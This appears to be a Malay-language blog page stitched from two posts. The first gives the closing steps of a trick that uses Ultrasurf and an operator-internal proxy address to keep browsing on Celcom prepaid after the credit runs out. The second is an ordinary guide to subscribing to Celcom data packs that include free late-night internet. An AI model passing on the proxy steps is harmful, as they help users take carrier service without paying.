    4. Pastu turun bawah, click proxy setting, n then tick ''direct used ultra surf ''...

        kemudian exit..

    5. Dalam browser yang korang guna tu, pergi kat "option" - "connection", set manual proxy 127.0.0.1 dengan port 9666

    6. Sekarang connect 3G modem...ataupun jika anda mempunyai USB broadband maxis,atau mane2,masukkan je simkad celcom korang.Ade rezeki dapat lah.hehe

    7. Dah connect, run Ultrasurf, tunggu sampai dia cakap "successfully connected to server"

    * Jika anda tak dapat connect guna ultrasurf tu. Sila Guna langkah ke-2 ini.

    1. Dalam Ultrasurf  - "Option" - "Proxy Setting" - "Manual Proxy Setting" - "Proxy Host" 10.128.1.242 "Proxy Port" 8080 - Ok - Close ultasurf - lepas tu open balik


    * Kalau tak boleh jugak
       
    2. Bukak UltraSulrf balik - "Proxy Setting" - tick "Direct use ultrasurf"

    Sekarang dah boleh open browser yang telah di set manual proxy tadi, confirm boleh surf, youtube dan download walaupun credit prepaid celcom bb dah habis.

    Perhatian!! ...
    Jangan try benda ni masa kredit simcard tengah ada/banyak sebab aku tak jamin dia tak tolak kredit, tapi kalau kredit simcard dah abis, tak dak masalah,

    sekian.terima kasih...

    Cara Dapat Unlimited Internet Celcom Dengan Internet Burung Hantu

    internet free


    Assalamualaikum...

    Ada beberapa soalan yang mana mungkin hampir seluruh warga Malaysia akan jawab "Ya !!".
    Malah bukan sahaja di Malaysia, di seluruh dunia juga jika diajukan soalan sebegini pasti akan beri jawapan yang sama ...


    Ini soalannya :-

    Suka dengan Internet ??

    Nak dapat free Internet tanpa had ??

    Nak internet berkelajuan tinggi ??



    haha.. memang tidak asing lagi dunia serba teknologi ni mampu menarik minat semua orang dengan hanya INTERNET !!
    Tapi biasalah, dekat Malaysia ni sebenarnya kelajuan Internet taklah seberapa laju dengan negara Barat nun jauh di sana tu..
    Lepastu, Harga langganan Internet pulak memang kebanyakannya tak masuk akal !! ( Tapi bukannya semua )


    Sebelum ni saya ada post mengenai kelebihan dan kekurangan Magic Sim From Xpax !!
    Tapi kali ni admin nak cerita sikit, tahun lepas pihak Celcom dah sebulat suara untuk bagi Internet Unlimited Kuota ni kepada pengguna-penggunanya..
    Betul ke ?? Yess !!


    Free internet unlimited kuota yang ditawarkan ni juga dikenali sebagai INTERNET BURUNG HANTU ..

    Kenapa burung hantu ?? sebabnya Celcom hanya bagi Free Unlimited Kuota pada jam 1 pagi sehingga 7 pagi je ( 1am-7am ).


    Dan kena ingat, bukan senang-senang je nak dapat Free Internet Unlimited ni ...
    Kita kenalah langgan internet ni dulu. hahaha.. tengok, Celcom pun pandai buat trik ni untuk kepentingan Celcom jugak. Maklumlah, nak untung katakan !!
    Tapi, kira terbaikk dan berbaloi lahh Celcom buat macam ni !!
    Sebab tu lah saya pun dah lebih tiga kali langgan internet ni..


    Singgah Juga: Cara Download Video YouTube tanpa guna Software !!


    Macam mana nak langgan dan dapat free Internet Burung Hantu ni ??
    Untuk dapat Free Unlimited Internet, kena langgan Internet ni untuk seminggu ataupun sebulan.. kalau harian memang tak jadi.


    Cara-caranya :-

    1. dail *118#

    2. pilih Internet Packs

    3. pilih Subscribe to Internet Packs

    4. Kalau nak internet bulanan, pilih Monthly

    5. Kalau nak mingguan pilih next, kemudian pilih weekly



    Untuk Internet bulanan ada 3 pilihan :-

    1. RM60 ( 4.5Gb + YONDER MUSIC )
    2. RM40 ( 2.5Gb + YONDER MUSIC )
    3. RM30 ( 1.5Gb + YONDER MUSIC )


    Untuk Internet Mingguan pula ada 2 pilihan :-

    1. RM15 ( 800Mb + YONDER MUSIC )
    2. RM10 ( 500Mb + YONDER MUSIC )



    Apa Itu YONDER MUSIC ??

    - YONDER MUSIC adalah satu aplikasi yang mana bergabung dengan pihak Celcom.
    - Kita juga boleh dapatkan TOPUP PERCUMA RM10 bila daftar untuk kali pertama dalam aplikasi YONDER MUSIC ni.
    - Jangan risau, pendaftarannya adalah percuma.
    - Dalam beberapa hari, kita akan dikreditkan RM10 dalam akaun prabayar kita.


    Apa kelebihan bila daftar Internet Burung Hantu ni ??

    1. Kelajuannya melebihi 600kbps
    2. Dapat free minit untuk panggilan ( sama rangkaian )
    3. Dapat free Mesej ( sama rangkaian )

    Saya syorkan supaya kalau nak langgan Internet bulanan, baik pilih no 3 tu (RM30)..
    sebab memang dah cukup banyak 1.5Gb tu.. kita pun taknak la membazir sangat.
    Macam saya memang sentiasa langgan Internet bulanan RM30, 1.5 Gb.
    Benda free yang saya dapat selain Burung Hantu ialah dapat 75 minit panggilan & 75 SMS..
    Tak lupa juga YONDER MUSIC. tapi, saya dah daftar untuk kali pertama.. dalam selang beberapa hari, RM10 masuk dalam akaun prabayar saya.

    Lepas kita langgan Internet ni, Celcom akan hantar mesej seperti gambar di bawah :-

    celcom unlimited internet










    Kalau nak cek baki internet boleh dial *118# >> Internet Packs >> Check Internet Balance.
    Cek baki Internet melalui sms pun boleh, taip "MAX STATUS" hantar ke "28882".

    Free internet celcom








    Prabayar kita kena sentiasa active untuk main internet (belum tamat tempoh)



    Selepas nak hampir sebulan langgan Internet, pihak Celcom akan hantar mesej pemberitahuan bahawa Internet kita akan diperbaharui ( caj RM30 )
    Kalau kita tak nak langgan dah Internet untuk bulan berikutnya, taip "STOP" hantar ke "28882"

    Unlimited celcom internet